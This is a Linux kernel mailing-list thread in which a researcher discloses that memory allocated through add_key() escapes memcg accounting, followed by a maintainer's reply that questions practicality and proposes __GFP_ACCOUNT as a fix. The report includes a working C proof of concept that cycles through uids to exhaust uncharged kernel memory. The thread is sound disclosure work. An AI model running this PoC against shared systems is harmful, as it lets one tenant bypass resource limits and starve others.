linux-mm.kvack.org archive mirror
* add_key() syscall can lead to bypassing memcg limits
@ 2021-03-28  2:30 杨昱天
  2021-03-29  7:39 ` Michal Hocko
  0 siblings, 1 reply; 2+ messages in thread
From: 杨昱天 @ 2021-03-28  2:30 UTC (permalink / raw)
  To: hannes, mhocko, vdavydov.dev; +Cc: cgroups, linux-mm, shenwenbosmile


Hi, our team has found a bug in key_alloc() on Linux kernel v5.10.19, which leads to bypassing memcg limits.
The bug is caused by the code snippets listed below:

/*--------------- key.c --------------------*/
...
276  /* allocate and initialise the key and its description */
277  key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
278  if (!key)
279          goto no_memory_2;
...
/*---------------- end ---------------------*/

/*------------- keyctl.c -------------------*/
...
95  if (_description) {
96          description = strndup_user(_description, KEY_MAX_DESC_SIZE);
97          if (IS_ERR(description)) {
...
/*--------------- end ---------------------*/

Each user can allocate ~20KB of uncharged memory by calling the add_key() syscall to trigger the code listed above.
The code at line 277 in the first snippet allocates a new struct key object that is not charged to the memcg, because no accounting flag is passed
either at this allocation site or at the site that creates key_jar. At line 96 in the second snippet, the memory used by the description of a key,
which has a maximum size of 4096 bytes, is also not charged. A user can allocate multiple keys and thereby consume more uncharged memory.
By default, the total size of key memory is limited to 20,000 bytes per user.

The bug can lead to a severe bypass of memcg limits if a process can change its uid and thereby get around the per-user limit above. For example, a user may hold root privileges
in its own user namespace and use the seteuid() syscall to keep switching to new uids.
Our evaluation on QEMU v5.1.0 + cgroup v2 shows that, under this assumption, we could consume ~2.2GB of memory by allocating keys from 100,000 different uids, while the memory charged by memcg was only ~215MB.

The PoC code is listed below:

/*--------------- PoC --------------------*/
#define _GNU_SOURCE
#include <asm/unistd.h>
#include <linux/keyctl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>

char desc[4000];

/* Switch to the given euid and add keys until add_key() fails. */
void alloc_key_user(int id) {
  int i = 0, times = 0;
  long serial = 0;

  if (seteuid(id) != 0) {
    printf("uid allocation failed on id %d!\n", id);
    return;
  }
  printf("uid allocation success on id %d!\n", id);

  for (;;) {
    /* Random non-NUL bytes, so that each key gets its own description. */
    for (i = 0; i < 3900; ++i)
      desc[i] = rand()%255 + 1;
    desc[i] = '\0';
    serial = syscall(__NR_add_key, "user", desc, "payload",
      strlen("payload"), KEY_SPEC_SESSION_KEYRING);
    if (serial == -1)  /* failed, e.g. the per-user quota is exhausted */
      break;
    ++times;
  }
  printf("allocation happened %d times.\n", times);
  seteuid(0);  /* switch back so that the next seteuid() can succeed */
}

int main(void) {
  int loop_times = 0;
  int start_uid = 0;

  /* Input: the first uid to use and the number of consecutive uids. */
  if (scanf("%d %d", &start_uid, &loop_times) != 2)
    return 1;
  srand(time(0));
  for (int i = 0; i < loop_times; ++i) {
    alloc_key_user(i+start_uid);
  }
  return 0;
}

/*-------------PoC end ---------------------*/

Thanks!

Best regards,
Yutian Yang



* Re: add_key() syscall can lead to bypassing memcg limits
  2021-03-28  2:30 add_key() syscall can lead to bypassing memcg limits 杨昱天
@ 2021-03-29  7:39 ` Michal Hocko
  0 siblings, 0 replies; 2+ messages in thread
From: Michal Hocko @ 2021-03-29  7:39 UTC (permalink / raw)
  To: 杨昱天
  Cc: hannes, vdavydov.dev, cgroups, linux-mm, shenwenbosmile,
	David Howells, Jarkko Sakkinen, James Morris, Serge E. Hallyn,
	keyrings, linux-security-module

Cc keyctl maintainers

On Sun 28-03-21 10:30:34, 杨昱天 wrote:
> Hi, our team has found a bug in key_alloc() on Linux kernel v5.10.19, which leads to bypassing memcg limits.
> The bug is caused by the code snippets listed below:
> 
> /*--------------- key.c --------------------*/
> ...
> 276  /* allocate and initialise the key and its description */
> 277  key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
> 278  if (!key)
> 279          goto no_memory_2;
> ...
> /*---------------- end ---------------------*/
> 
> /*------------- keyctl.c -------------------*/
> ...
> 95  if (_description) {
> 96          description = strndup_user(_description, KEY_MAX_DESC_SIZE);
> 97          if (IS_ERR(description)) {
> ...
> /*--------------- end ---------------------*/
> 
> Each user can allocate ~20KB of uncharged memory by calling the add_key() syscall to trigger the code listed above.
> The code at line 277 in the first snippet allocates a new struct key object that is not charged to the memcg, because no accounting flag is passed
> either at this allocation site or at the site that creates key_jar. At line 96 in the second snippet, the memory used by the description of a key,
> which has a maximum size of 4096 bytes, is also not charged. A user can allocate multiple keys and thereby consume more uncharged memory.
> By default, the total size of key memory is limited to 20,000 bytes per user.
> 
> The bug can lead to a severe bypass of memcg limits if a process can change its uid and thereby get around the per-user limit above. For example, a user may hold root privileges
> in its own user namespace and use the seteuid() syscall to keep switching to new uids.
> Our evaluation on QEMU v5.1.0 + cgroup v2 shows that, under this assumption, we could consume ~2.2GB of memory by allocating keys from 100,000 different uids, while the memory charged by memcg was only ~215MB.

Can the user/attacker create all those different uids? Or what would be
a typical scenario where this is a threat? In other words, is this a
practical attack vector?

If yes, then the mitigation would be quite easy for the key_jar (just
add __GFP_ACCOUNT). I am not aware of a strndup_user alternative with
kmemcg accounting enabled, so this would have to be added.


-- 
Michal Hocko
SUSE Labs

